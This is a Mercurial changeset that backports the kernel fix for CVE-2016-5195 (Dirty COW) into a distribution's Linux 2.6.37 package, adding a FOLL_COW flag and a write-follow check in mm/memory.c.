# HG changeset patch # User Pascal Bellard # Date 1477060314 -7200 # Node ID d4e29f7d8c7cd907cc6bf8fa0c7a13fbb319bd39 # Parent 798e77f8326009aab4de276b456e7f7923612310 linux: CVE-2016-5195 diff -r 798e77f83260 -r d4e29f7d8c7c linux/receipt --- a/linux/receipt Wed Jul 27 13:48:34 2016 +0200 +++ b/linux/receipt Fri Oct 21 16:31:54 2016 +0200 @@ -75,6 +75,7 @@ 003-squashfs-x86-support-xz-compressed-kernel.patch 004-squashfs-add-xz-compression-support.patch 005-squashfs-add-xz-compression-configuration-option.patch +$PACKAGE-CVE-2016-5195.u EOT [ ! -x /usr/bin/cook ] && report step "Make kernel proper and then build lguest" diff -r 798e77f83260 -r d4e29f7d8c7c linux/stuff/linux-CVE-2016-5195.u --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/linux/stuff/linux-CVE-2016-5195.u Fri Oct 21 16:31:54 2016 +0200 @@ -0,0 +1,84 @@ +--- linux-2.6.37/include/linux/mm.h ++++ linux-2.6.37/include/linux/mm.h +@@ -1415,6 +1415,7 @@ + #define FOLL_GET 0x04 /* do get_page on page */ + #define FOLL_DUMP 0x08 /* give error on hole if it would be zero */ + #define FOLL_FORCE 0x10 /* get_user_pages read/write w/o permission */ ++#define FOLL_COW 0x4000 /* internal GUP flag */ + + typedef int (*pte_fn_t)(pte_t *pte, pgtable_t token, unsigned long addr, + void *data); +--- linux-2.6.37/mm/memory.c ++++ linux-2.6.37/mm/memory.c +@@ -1225,6 +1225,24 @@ + } + EXPORT_SYMBOL_GPL(zap_vma_ptes); + ++static inline bool can_follow_write_pte(pte_t pte, struct page *page, ++ unsigned int flags) ++{ ++ if (pte_write(pte)) ++ return true; ++ ++ /* ++ * Make sure that we are really following CoWed page. We do not really ++ * have to care about exclusiveness of the page because we only want ++ * to ensure that once COWed page hasn't disappeared in the meantime ++ * or it hasn't been merged to a KSM page. ++ */ ++ if ((flags & FOLL_FORCE) && (flags & FOLL_COW)) ++ return page && PageAnon(page) && !PageKsm(page); ++ ++ return false; ++} ++ + /** + * follow_page - look up a page descriptor from a user-virtual address + * @vma: vm_area_struct mapping @address +@@ -1286,10 +1304,13 @@ + pte = *ptep; + if (!pte_present(pte)) + goto no_page; +- if ((flags & FOLL_WRITE) && !pte_write(pte)) +- goto unlock; + + page = vm_normal_page(vma, address, pte); ++ if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, page, flags)) { ++ pte_unmap_unlock(ptep, ptl); ++ return NULL; ++ } ++ + if (unlikely(!page)) { + if ((flags & FOLL_DUMP) || + !is_zero_pfn(pte_pfn(pte))) +@@ -1310,7 +1331,7 @@ + */ + mark_page_accessed(page); + } +-unlock: ++ + pte_unmap_unlock(ptep, ptl); + out: + return page; +@@ -1464,17 +1485,13 @@ + * The VM_FAULT_WRITE bit tells us that + * do_wp_page has broken COW when necessary, + * even if maybe_mkwrite decided not to set +- * pte_write. We can thus safely do subsequent +- * page lookups as if they were reads. But only +- * do so when looping for pte_write is futile: +- * in some cases userspace may also be wanting +- * to write to the gotten user page, which a +- * read fault here might prevent (a readonly +- * page might get reCOWed by userspace write). ++ * pte_write. We cannot simply drop FOLL_WRITE ++ * here because the COWed page might be gone by ++ * the time we do the subsequent page lookups. + */ + if ((ret & VM_FAULT_WRITE) && + !(vma->vm_flags & VM_WRITE)) +- foll_flags &= ~FOLL_WRITE; ++ foll_flags |= FOLL_COW; + + cond_resched(); + }